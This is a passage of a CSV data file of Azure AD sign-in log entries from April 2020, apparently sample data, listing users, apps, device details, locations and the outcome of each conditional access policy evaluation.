demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",89223cb6-60af-4a3e-b2e1-947017641400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,89223cb6-60af-4a3e-b2e1-947017641400,SigninLogs,Sucess,41.90428925,-85.99833679
+135,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:05.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a6233614-30bc-46f5-a1bd-d5d9680296b9,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f8429db1600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,ec85dd07-c5e8-494c-aa5b-3f8429db1600,SigninLogs,Sucess,33.7984581,-84.38828278
+136,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,25:42.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b0fb1d87-b695-487e-bbc5-f8685d3e823c,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:25,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179e964c1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,62115b57-0cb2-458e-8ba0-179e964c1800,SigninLogs,Sucess,33.7984581,-84.38828278
+137,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:18.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4ba8b789-61c2-4059-8ea6-5597604fb15f,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:54,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",80d584c4-dd35-4dcb-882c-059334701900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,80d584c4-dd35-4dcb-882c-059334701900,SigninLogs,Sucess,33.7984581,-84.38828278
+138,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:03.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,23d82071-2998-4544-99f1-26efc8fefc8c,Microsoft.aadiam,Microsoft.aadiam,,Preeti Krishna,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 23:35,"{'operatingSystem': 'Windows 10', 'deviceId': '2b5ce400-46e8-497f-b04f-4fd16c0e0ea8', 'browser': 'Edge 18.1836', 'displayName': 'PREETIKR-SUR', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",250ee335-2b43-46f0-bae5-c14e52310200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.17095184326172, 'latitude': 47.69049072265625}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Preeti Krishna,9c124f6b-0d06-49b1-8509-ca2aab3d2038,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,250ee335-2b43-46f0-bae5-c14e52310200,SigninLogs,Sucess,47.69049072,-122.1709518
+139,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:07.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8e1c9d61-11c4-4cd7-8fcc-21c2e20d5324,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c3a23e25-0820-4eee-81ce-29eb16821b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,c3a23e25-0820-4eee-81ce-29eb16821b00,SigninLogs,Sucess,33.7984581,-84.38828278
+140,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:33.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,33b9da56-2a44-41aa-b00d-acacf2903dd6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:39,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",c3a23e25-0820-4eee-81ce-29eb95851b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,c3a23e25-0820-4eee-81ce-29eb95851b00,SigninLogs,Sucess,33.7984581,-84.38828278
+141,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:30.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,311f07c6-38c9-4e24-b2ea-9e6c078aafa0,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 11:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5949abe0-9b87-40bf-991e-6df759561000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,5949abe0-9b87-40bf-991e-6df759561000,SigninLogs,Sucess,50.6406517,5.572050095
